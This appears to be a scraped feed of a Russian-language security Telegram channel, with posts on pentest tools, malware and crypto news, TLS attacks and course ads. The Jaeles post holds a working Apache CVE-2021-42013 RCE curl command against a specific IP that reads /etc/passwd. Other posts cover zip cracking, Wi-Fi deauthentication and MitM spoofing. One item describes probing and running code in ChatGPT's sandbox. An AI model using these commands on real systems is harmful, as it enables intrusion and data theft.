34787
Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278
Masscan 🕸
Masscan - это массовый сканер IP портов. Отправляя 10 миллионов пакетов в секунду, он может сканировать весь интернет за 6 минут. Этот инструмент полезен для обзора сетей большого масштаба — таких как Интернет или внутренние сети. Хотя скорость по умолчанию ограничена 100 пакетами в секунду, программа может разгоняться до 25 миллионов пакетов в секунду, при такой скорости весь (по одному порту на IP) Интернет будет просканирован за 3 минуты.
Он создаёт результат схожий с nmap. Внутри он работает подобно scanrand, unicornscan и ZMap, используя асинхронную передачу.
Чтобы его использовать, нужно ввести следующую команду:
masscan -p22,80,445 <IP>/24Читать полностью…
Вы когда-нибудь замечали странные профили среди ваших друзей в Steam с именами, похожими на случайные наборы символов? Возможно, это не просто шутка, а часть сложной кибератаки.
Расследование Solar4Rays проливает свет на то, как злоумышленники используют платформы вроде Steam и Telegram в сочетании с техникой Dead Drop Resolver (DDR), чтобы скрыть адреса своих C2 (Command and Control) серверов.
Yersinia 🕸
Платформа для проведения атак второго уровня. Он предназначен для использования некоторых недостатков различных сетевых протоколов. Он претендует на роль надежной основы для анализа и тестирования развернутых сетей и систем.
Yersinia получила название в честь бактерий иерсиний и стала сетевой утилитой, которая разработана для использования уязвимых сетевых протоколов под видом безопасной сетевой системы анализа и тестирования.
Протокол связующего дерева (STP).
Протокол обнаружения Cisco (CDP).
Динамический транкинговый протокол (DTP).
Протокол динамической конфигурации хоста (DHCP).
Протокол маршрутизатора горячего резерва (HSRP).
802.1к.
802.1х.
Протокол межкоммутаторного соединения (ISL).
Транкинговый протокол VLAN (VTP).
yersinia -GЧитать полностью…
SSH
Запуск SSH и добавление его в автозагрузку делается следующими командами:
sudo systemctl enable sshd.service --now
sudo service ssh start
ssh username@IP -p 22
PermitRootLogin установите значение Yes. Делать так я настоятельно не рекомендую.Читать полностью…
fcrackzip 📂
Данный инструмент взламывает запароленные zip архивы.
По умолчанию программа не установлена, устанавливаем:
sudo apt install fcrackzip
fcrackzip archive.zip
possible pw found: 123456seven
Где, 123456seven - и есть наш пароль.Читать полностью…
🔄 💻 tartufo 5.0.2
🔸Поиск в репозиториях git строк и секретов основываясь на энтропии.
🔸Проверяет историю коммитов и т.д.
🔸Похож на trufflehog, но мне понравился даже больше в РУ реалиях.
🔸Написан на Python 🐍
Установка:
pip install tartufo
tartufo scan-folder [OPTIONS] TARGET
tartufo scan-local-repo [OPTIONS] REPO_PATH
tartufo scan-remote-repo [OPTIONS] GIT_URL
tartufo scan-remote-repo https://github.com/akhomlyuk/pyradm
⚙️ Jaeles v0.17.1
Мощный, гибкий и легко расширяемый framework, написанный на 🖼️ Go для создания собственного сканера веб-приложений. Работает с .yaml шаблонами и чем то похож на nuclei.
Установка:
go install github.com/jaeles-project/jaeles@latest
jaeles config init
# Scan Usage example:
jaeles scan -s <signature> -u <url>
jaeles scan -c 50 -s <signature> -U <list_urls> -L <level-of-signatures>
jaeles scan -c 50 -s <signature> -U <list_urls>
jaeles scan -c 50 -s <signature> -U <list_urls> -p 'dest=xxx.burpcollaborator.net'
jaeles scan -c 50 -s <signature> -U <list_urls> -f 'noti_slack "{{.vulnInfo}}"'
jaeles scan -v -c 50 -s <signature> -U list_target.txt -o /tmp/output
jaeles scan -s <signature> -s <another-selector> -u http://example.com
jaeles scan -G -s <signature> -s <another-selector> -x <exclude-selector> -u http://example.com
cat list_target.txt | jaeles scan -c 100 -s <signature>
# Examples:
jaeles scan -s 'jira' -s 'ruby' -u target.com
jaeles scan -c 50 -s 'java' -x 'tomcat' -U list_of_urls.txt
jaeles scan -G -c 50 -s '/tmp/custom-signature/.*' -U list_of_urls.txt
jaeles scan -v -s '~/my-signatures/products/wordpress/.*' -u 'https://wp.example.com' -p 'root=[[.URL]]'
cat urls.txt | grep 'interesting' | jaeles scan -L 5 -c 50 -s 'fuzz/.*' -U list_of_urls.txt --proxy http://127.0.0.1:8080
jaeles server -s '/tmp/custom-signature/sensitive/.*' -L 2 --fi
curl 'http://62.173.140.174:10009/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; id && cat /etc/passwd'
./jaeles scan -s '~/.jaeles/base-signatures/cves/apache-rce-cve-2021-42013*' -u 'http://62.173.140.174:10009' -v
./jaeles config initЧитать полностью…
🔄 ♥️ bettercap v2.40.0
Мощная, легко расширяемая платформа, написанная на 💻 Go, которая призвана предложить исследователям, пентестерам и реверс-инженерам простое в использовании решение "все в одном", для проведения разведки и атак на сети 👴 Wi-Fi, Bluetooth, беспроводные HID устройства и сети 🚠 Ethernet.
Установка в 💻 Kali:
sudo apt update && sudo apt install bettercap
docker pull bettercap/dev
docker run -it --privileged --net=host bettercap/dev -h
sudo bettercap -caplet http-ui
sudo bettercap
Логин: user
Пароль: pass
Сканирование WiFi сетей, деаутентификация клиентовЧитать полностью…
Авто захват рукопожатий
Bluetooth сканирование
ARP, DNS, NDP and DHCPv6 спуферы для MitM атак
Мощный сетевой сниффер
Быстрый сканер портов
Удобный веб интерфейс
И многое другое
Telegram продолжает набирать популярность среди злоумышленников, использующих его для распространения вредоносных программ, таких как Lumma Stealer.
Lumma Stealer способен украсть огромное количество личной информации: логины, пароли, данные банковских карт, истории браузеров и многое другое.
⚙️ Как работает атака?
Lumma Stealer распространяется через Telegram-каналы, которые предлагают "крякнутые" программы или архивы с якобы безвредным ПО. Один из таких каналов, VIP HitMaster Program, насчитывает более 42,000 подписчиков, а второй, MegaProgram +, имеет 8660 подписчиков. Интересно, что оба канала часто пересылают друг другу сообщения, что делает их влияние ещё более широким.
В одном из разобранных случаев, злоумышленники замаскировали вредоносный файл под популярную программу CCleaner 2024 — средство для очистки системы и оптимизации производительности. Но после извлечения из архива (.rar) пользователи обнаруживали, что вместо ожидаемого установочного файла CCleaner, они получали два заражённых файла, одним из которых был Lumma Stealer. В частности, файл с названием XTb9DOBjB3.exe является вредоносным и используется для кражи конфиденциальной информации.
⚙️ Механизмы скрытности и обфускации
Файл был не просто вредоносным, но и тщательно замаскированным. Например, он скрывал код, который подключался к аккаунту на Steam, чтобы установить связь с командным сервером злоумышленника. Странным образом, имя пользователя было зашифровано и подключено к нескольким псевдонимам.
После дешифровки этого имени, вредоносное ПО связывалось с сервером командования и управления (C2), что позволяло атакующим не только красть данные, но и скачивать дополнительные вредоносные файлы. Все эти действия затрудняют обнаружение вредоносного ПО антивирусами и системами защиты.
💱 География атак
Больше всего атак в настоящее время подвергаются пользователи Telegram из Индии, за ними следуют пользователи из США и Европы. Это подтверждает, что злоумышленники стремятся охватить как можно более широкую аудиторию, используя Telegram как популярную платформу для доставки угроз.
🚨 Запомните, использование популярных платформ как каналов для распространения вредоносного ПО — это не что-то новое, но Telegram даёт злоумышленникам уникальные возможности для обхода защиты. Поэтому будьте особенно внимательны к тем файлам, которые вы скачиваете и открываете через этот мессенджер.
#новости
Дипфейк — это поддельное фото, видео или аудио, сгенерированное искусственным интеллектом для имитации внешности и голоса человека. При создании дипфейков нейросеть анализирует и копирует мимику, движения лица, интонацию и даже фон речи. 👀
В новой статье разбираем как работают дипфейки и как с ними бороться.
Основные инструменты создания дипфейков — это генеративно-состязательные сети (GAN), автоэнкодеры, рекуррентные сети (для аудио) и сложные алгоритмы трекинга движений лица.
🗣️ Сейчас дипфейки можно встретить как в развлекательной индустрии, так и в рекламе. Например, дипфейк с Брюсом Уиллисом использовался в рекламе «МегаФона», а в кинематографе они позволяют завершать съёмки с участием актёров, которые покинули проект, как это было с Полом Уокером в «Форсаже 7».
NetScanner👴
Netscanner — это инструмент сканирования сети с такими функциями, как: Список интерфейсов оборудования, Переключение активного интерфейса для сканирования и дампа пакетов, Сканирование сетей WiFi, Уровень сигнала WiFi (с диаграммами), Pinging CIDR с именем хоста, oui и mac-адресом, Дамп пакетов (TCP, UDP, ICMP, ARP), Дамп пакетов, Запуск/пауза дампа пакетов.
Использование netscanner:
-t, --tick-rate: Скорость тика, т.е. количество тиков в секунду (По умолчанию: 1)
-f, --frame-rate: Частота кадров, т.е. количество кадров в секунду (По умолчанию: 10)
-h, --help: Вывод помощи
-v, --version: Вывод версии программы
netscanner
Вы сможете увидеть сигнали WiFi в левом верхнем меню, в правом верхнем доступные интерфейсы, а снизу Пакеты, Порты, Трафик.Читать полностью…
🛡 Это на 100% практический курс по пентесту, где вы попробуете изученные техники взлома
Старт: 2 декабря. Успейте приобрести курс по старой цене до конца ноября!📥
Содержание курса:
🔸 65 рабочих и 16 экзаменационных тасков в лаборатории ✔️
🔸 эксплуатация всех актуальных типов уязвимостей, активный / пассивный фаззинг
🔸 SQL Injection и CMD Injection, Cross Site Scripting, PHP injection, Server Side Template injection
🔸 техники повышения привилегий, Client-side атаки (XSS, CSRF)
🔸 трудоустройство / стажировка для лучших выпускников 🥇
Получите практические навыки как в рабочих задачах, так и в Bug Bounty.
📥С декабря стоимость курсов увеличится на 15%
🚀 Пишите нам @Codeby_Academy
➡️ Подробнее о курсе
❓ Кто сказал, что форензики не любят GUI?
📣 VolWeb - это платформа для анализа цифровой судебной памяти, которая использует возможности фреймворка Volatility 3.
🥇 Главным преимуществом VolWeb является предоставление визуального интерфейса для цифровой криминалистики, а также автоматическая обработка и извлечение артефактов с использованием мощностей фреймворка Volatility 3.
✔️ Клонируем репозиторий
git clone https://github.com/k1nd0ne/VolWeb.git
openssl genrsa > ./privkey.pem
openssl req -new -x509 -key ./privkey.pem > ./fullchain.pem
cd VolWeb/docked
cp .env.aws.example .env
vim .env (or any text editor)
cd VolWeb/docker
docker-compose up
admin:passwordЧитать полностью…
user:password
💵 Стример потерял $100,000 из-за утечки seed-фразы во время эфира
Англоязычный криптовалютный стример случайно раскрыл свою seed-фразу во время прямой трансляции, что привело к мгновенной утрате $100,000 (около 10 млн рублей).
Ошибка произошла из-за того, что на экране оказалось открыто приложение с заметками, где была сохранена резервная фраза. Злоумышленники тут же воспользовались этой информацией и вывели все средства.
✏️ Seed-фраза — это ключ к вашему криптокошельку. Получив доступ к ней, любой человек может полностью контролировать средства на счёте.
💡 Как избежать таких ситуаций?
🔸Никогда не храните seed-фразу в цифровом формате (особенно на устройствах с выходом в интернет).
🔸Используйте двухфакторную аутентификацию.
🗣️ Это не первый подобный случай. В июле стример Дмитрий Dmitry_Lixxx Лиханов также случайно показал свою seed-фразу в эфире. Хоть часть средств и удалось вернуть, история обошлась ему в немалую сумму.
В киберкриминальном мире появился новый фишинговый инструмент — GoIssue, нацеленный на пользователей GitHub и всю софтверную экосистему. 👀 GoIssue позволяет злоумышленникам собирать email-адреса с профилей GitHub и запускать массовые фишинговые атаки, что повышает риск кражи исходного кода и проникновения в корпоративные сети.
Повышенный риск для GitHub и организаций 🛡
🔸По данным SlashNext, GoIssue представляет собой серьёзную угрозу для разработчиков, использующих GitHub. Захватив учетные данные одного разработчика, злоумышленники могут развернуть атаки на цепочки поставок, создавая уязвимости для всей компании.
🔸Фишинговые кампании, запущенные через GoIssue, могут привести к краже учетных данных, загрузке вредоносного ПО или несанкционированному доступу к приватным репозиториям.
Как работает GoIssue? ⚙️
Инструмент автоматизирует сбор email-адресов с GitHub, используя токены и фильтры по критериям — например, членству в организациях и активности. Затем отправляются фишинговые сообщения, имитирующие уведомления GitHub, которые могут обходить спам-фильтры и попасть прямо в почтовый ящик разработчиков.
Стоимость и доступность GoIssue
GoIssue продается за $700 за индивидуальную версию или $3,000 за полный исходный код, предоставляя анонимность через прокси-сети и позволяя запускать высокотаргетированные фишинговые кампании.
Мнение экспертов:
🗣️ «Появление GoIssue сигнализирует о новой эре, когда платформы для разработчиков становятся полем боя, и защита должна адаптироваться», — прокомментировал Джейсон Сороко из Sectigo.
🗣️ «Не менее важно дать пользователям навыки распознавать подозрительные письма и сообщать о них, а также интегрировать человеческую разведку в центр системы безопасности», — добавил Мика Аалто, сооснователь Hoxhunt.
Уже завтра, 29 ноября, с 11:00 до 19:00 МСК пройдет онлайн-конференция GetNet
Некоторые доклады:
- "Литературно-комиксовая зарисовка для любителей Mikrotik" – как DevOps изменяет сетевые технологии.
- "Вредные советы для сетевиков" – частые ошибки в управлении сетями и как их избегать.
- "Проблема ближнего радиуса" – углубляемся в безопасность с MikroTik RouterOS.
- "Средний бизнес — это маленький вайфай" – эффективное управление Wi-Fi для средних предприятий.
Заходите на огонек !
Студенческий ИТ-чемпионат «Кибербезопасность в финансах» от Банка России – соревнование для молодых специалистов в сфере информационной безопасности. В программе поиск флагов в CTF-задачах, решение аналитической задачи, а в финале – тематический кейс-чемпионат и сражение на киберполигоне в Екатеринбурге!
Собирайте команду единомышленников и включайтесь в борьбу за призовой фонд – 1 000 000 рублей. Регистрация
Приглашаем к участию студенческие команды из 4 или 5 человек. Подать заявку и присоединиться к яркому событию в мире инфобеза можно до 4 декабря.
Соревнование пройдет в 2 этапа: онлайн-отбор и офлайн-финал на форуме «Кибербезопасность в финансах» в Екатеринбурге!
Сначала на платформе Codenrock пройдет онлайн-этап (6-8 декабря):
🔹Четыре CTF-задачи – находите флаги, зарабатывайте баллы.
🔹Аналитическая задача – обнаружьте уязвимость в системе и предложите варианты защиты.
Лучшие 10 команд отборочного этапа будут объявлены уже 10 декабря и приглашены в Екатеринбург, где пройдет офлайн-финал (16-21 февраля) соревнования, включающий:
🔹Подготовку и защиту ИБ-кейса – за 2 месяца до очного этапа участники получат уникальную тему, которую необходимо проработать и презентовать жюри.
🔹Киберполигон – соревнование с лучшими соперниками и защита банка от киберугроз в реальном времени.
Финал чемпионата пройдет в рамках большого события федерального уровня – Уральского форума «Кибербезопасность в финансах» от Банка России.
Регистрация открыта до 4 декабря
Специалисты Unit42 исследовали использование кибергруппировкой Stately Taurus встроенной функции обратной оболочки Visual Studio Code.
🔎 Злоумышленники используют её для следующих целей:
⏺️выполнение произвольного кода и предоставление дополнительной полезной нагрузки;
⏺️доставка вредоносного ПО в зараженные среды;
⏺️проведение разведки;
⏺️извлечение конфиденциальных данных.
✏️ Для использования Visual Studio Code во вредоносных целях, злоумышленник может использовать переносимую версию code.exe (исполняемый файл для Visual Studio Code) или уже установленную версию программного обеспечения.
👀 Выполнив команду code.exe tunnel, злоумышленник получает ссылку, которая требует от него войти в GitHub под своей учетной записью. После входа в систему злоумышленник перенаправляется в веб-среду Visual Studio Code, подключенную к взломанному компьютеру. Затем ему разрешается выполнять команды и сценарии, а также создавать новые файлы на зараженном компьютере.
🚨 Для мониторинга данной угрозы в системе Windows можно использовать правила появления в журнале безопасности событий со следующими параметрами:
Event ID = 4688, Parent Process name содержит: «cmd.exe», New Process Name содержит "cmd" или ''powershell'.Читать полностью…
Event ID = 4663, Object Name содержит строку в формате %UserProfile%\.vscode-cli\code_tunnel.json
В 1998 году криптограф Даниэль Блейхенбахер обнаружил серьёзную уязвимость в реализации RSA-шифрования (PKCS#1 v1.5), используемой в SSL 2.0/3.0. Атака, получившая название Bleichenbacher's Attack или «атака миллиона сообщений», позволяла злоумышленникам расшифровывать данные без знания закрытого ключа.
Суть атаки заключалась в использовании оракула — сервера, который при расшифровке указывал, соответствует ли сообщение стандарту PKCS. Злоумышленник, адаптивно изменяя шифротекст и анализируя ответы оракула, мог частями восстанавливать зашифрованный текст. Это полностью компрометировало конфиденциальность SSL.
🤖 Возвращение проблемы
В 2017 году на смену «атаке миллиона сообщений» пришёл ROBOT (Return Of Bleichenbacher’s Oracle Threat). Исследователи обнаружили, что многие серверы до сих пор не корректно реализуют защиту RSA в соответствии с рекомендациями RFC 5246 для TLS. ROBOT использует те же принципы, что и атака Блейхенбахера, но с учётом современных реалий:
🔸 Распознавание различных типов ошибок сервера (тайм-ауты, сброс соединения, дублирующиеся оповещения TLS).
🔸 Возможность расшифровки текста или создания цифровой подписи от имени сервера.
🛡 Чем опасен ROBOT?
Хотя современные TLS-соединения чаще используют обмен ключами Диффи-Хеллмана на эллиптических кривых (ECDHE), уязвимые реализации RSA всё ещё встречаются, особенно в старом оборудовании или плохо обновляемых системах.
Важно понимать, что атака ROBOT не связана со стойкостью RSA как такового — она эксплуатирует только ошибки в реализации PKCS#1 v1.5.
Поиск файлов в Linux🔍
Существует несколько способов поиска файлов в Linux. Три основых - это команды locate, find и which.
Команда locate хранит свои данные в базе данных, потому при поиске работает быстрее.
Для начала нужно её обновить:
updatedb
locate:locate [ИМЯ ФАЙЛА]
-n для того, чтобы ограничить вывод. Комбинируйте это с командой grep о которой я рассказал тут и тогда вы получите больше примуществ.which. Она использует переменную среды $PATH для поиска результатов. Например, чтобы узнать где установлена та или иная программа, введите:which [ИМЯ ПРОГРАММЫ]
find является её возможность добавлять более детальные фильтры, что найти что-то. Например, чтобы найти файл в корневом каталоге, можно использовать:find /home/user/ -name "file.txt"
-size:find / -size +1G 2> /dev/null
2> /dev/null очистит вывод и отфильтрует ошибки
find / -perm -u=s -type f 2>/dev/nullЧитать полностью…
SQLMC 💉
SQLMC (SQL Injection Massive Checker) — это инструмент, предназначенный для сканирования домена на предмет уязвимостей SQL-инъекций. Он сканирует указанный URL-адрес до указанной глубины, проверяет каждую ссылку на наличие уязвимостей SQL-инъекций и сообщает о своих результатах.
Использование sqlmc:
-u, --url: Сканирует URL
-d, --depth: Глубина сканирования
-o, --output: Сохранить файл с выводом
sqlmc -u http://example.com -d 2Читать полностью…
🚩 Новые задания на платформе Codeby Games!
🕵️ Категория Форензика — В чём секрет кота Бориса?
🏆 Категория Квесты — SSL
🧰 Категория PWN — 0xLEET
Приятного хакинга!
Говорим о киберугрозах завтрашнего дня на ICEBREAKER 2024
Компания NGENIX продолжает регистрацию на IV ежегодную онлайн-конференцию о веб-безопасности. Дата проведения — 4 декабря в 11:00. Участие бесплатное.
Зрителей ждут тематические секции с докладами, презентациями и воркшопами. Выступления коснутся самых актуальных вопросов защиты сайтов и приложений.
➡️ Развитие российских продуктов ИБ и импортозамещение.
➡️ Противодействие актуальным угрозам, включая бот-атаки и атаки на API.
➡️ Лучшие практики использования WAF.
➡️ Средства аналитики для принятия решений при атаках и не только.
➡️ Инструменты обеспечения доступности веб-ресурсов.
➡️ Дефицит кадров в сфере ИБ.Будьте на шаг впереди злоумышленников!
Добро пожаловать на борт ICEBREAKER 2024 - https://clck.ru/3EZGWP
Необходимо взять под контроль безопасность корпоративной среды со множеством информационных систем, удаленных и офисных сотрудников, ротацией кадров? Обеспечить комфорт пользователей и победить аврал при администрировании ИС?🛡🧘♂️
📆На вебинаре 28 ноября в 11:00 мск расскажем, как закрыть эти проблемы одним решением. Представим систему «Цифровой КУПОЛ», которая позволяет создать единую точку администрирования и контроля доступа для всех ИС организации. Продукт включен в реестр отечественного ПО и соответствует требованиям ФСТЭК России.
📌В программе
1. Задачи ИБ и системного администрирования, которые решает «Цифровой КУПОЛ»:
🔹настройка регламентов доступа, парольных политик;
🔹управление сессиями и контроль доступов;
🔹многофакторная аутентификация;
🔹централизованное управление ролями и правами доступа;
🔹интеграция с LDAP или локальное хранение доступов.
2. Требования и практики безопасной разработки ПО, заложенные в основу создания «Цифрового КУПОЛА».
👉Регистрация.
Компоненты AD Kerberos, Microsoft SQL Server и центр сертификации — как их взломать? 💬
Научим на курсе “Атака на Active Directory". Авторы: HackerRalf (Михаил Порываев) и BlackRabbit (Павел Никитин), 5-кратные победители the Standoff
Содержание курса:
🙂 Архитектура AD и ее базис
🙂 Харденинг в AD, добыча критичной информации, развитие по инфраструктуре
🙂 Как закрепиться внутри? Техники и эксплоиты
➡️ практическая лаборатория AD содержит более 30 виртуальных машин, позволяя участникам отточить свои навыки на практике в 100+ рабочих тасках
🌟 Сертификат / удостоверение о повышении квалификации
🌟 Старт: 16 декабря*
*Успейте приобрести курс по старой цене до конца ноября!
🚀 @Codeby_Academy
➡️ Узнать подробнее о курсе
➡️ Читайте отзывы от учеников предыдущих потоков здесь
Права доступа в Linux💻
В правах доступа для файлов и каталогов приминяется одинаковый принцип. В целях упрощения права доступа разделены на три категории:
r - чтение: 4;
w - запись: 2;
x - исполнение: 1;
[User:r/w/x] [Group:r/w/x] [All:r/w/x]
#!/bin/bash
echo "Hello world!"
ls -la | grep 'main.sh'-rw-r--r--
chmod:chmod 774 main.sh
Почему 774? Ответ: Мы прибегли с следующей формуле User/Group/All:4+2+1, где 4 - чтение, 2 - запись, 1 - исполнение. 4+2+1=7
chmod +x main.shтакже будет работать и позволит скрипту исполниться. Читать полностью…
Исследователь Марко Фигероа поделился своими исследованиями о получении широкого доступа к песочнице ChatGPT.
Сама песочница представляет из себя изолированную среду, позволяющую пользователям безопасно взаимодействовать с ней и быть изолированными от других пользователей.
✏️ Используя команду list files /home/sandbox/.openai_internal/ исследователю удалось получить информацию о конфигурации и настройках песочницы.
🏆 Воодушевившись найденными результатами, он получил возможность загружать в папку /mnt/data собственные Python-скрипты и выполнять их!
❗️При этом стоит отметить, что песочница не предоставляет доступ к определённым конфиденциальным папкам и файлам (/root, /etc/shadow и т.д.).
👀 Однако OpenAI в своей bug bounty программе считает, что даже если таким путем можно извлечь файлы конфигурации, это все равно не является основанием для получения вознаграждения.
✔️ Вероятно, решение OpenAI оставить некоторые действия в «песочнице» как выходящие за рамки отражает их уверенность в стратегии сдерживания пользователя за пределы контейнера.
В 2016 году Илья Лихтенштейн, 35-летний предприниматель российского происхождения, взломал одну из крупнейших криптобирж мира — Bitfinex. Он похитил 120 000 биткоинов, стоимость которых с $70 млн на момент кражи выросла до $10,7 млрд.
✏️ Приговор и сотрудничество с властями
На этой неделе федеральный суд США приговорил Лихтенштейна к 5 годам лишения свободы. Его жена, Хизер Морган, также обвиняется в участии в отмывании украденных средств. Она была вовлечена в процесс без подробных объяснений со стороны Лихтенштейна, а узнала о взломе лишь в 2019 году.
✏️ Лихтенштейн полностью признал свою вину и помог правоохранительным органам вернуть 96% украденных биткоинов, а также предоставил ценную информацию для расследований других киберпреступлений.
Громкая кража и уникальная схема
🔸 Украдено: 120 000 BTC
🔸 Отмыто: ~21% от суммы (около $14 млн)
🔸 Средства перемещались с использованием курьеров из Казахстана и Украины.
🗣️ Сотрудники IRS назвали использованную Лихтенштейном схему отмывания одной из самых сложных, с которыми они сталкивались.
🔴 В новом выпуске подкаста «Безопасно говоря» от экспертов Yandex Cloud вы узнаете, как устроены современные автомобили с точки зрения информационной безопасности и чем занимаются службы ИБ у автопроизводителей.
Слушайте на Яндекс Музыке или YouTube
POODLE — это опасная уязвимость в старом криптографическом протоколе SSL 3.0. Эксплойт позволяет злоумышленникам расшифровывать данные, которые пользователи передают на уязвимых сайтах, и даже захватывать их сессии.
✏️ Что такое SSL и CBC?
SSL (Secure Socket Layer) — протокол, обеспечивающий защищённую передачу данных. Он использует асимметричное шифрование для аутентификации и симметричное для конфиденциальности.
В случае с POODLE наибольшая проблема кроется в режиме шифрования CBC (Cipher Block Chaining), где каждый блок данных зашифрован на основе предыдущего, что создаёт слабое место для потенциальной атаки.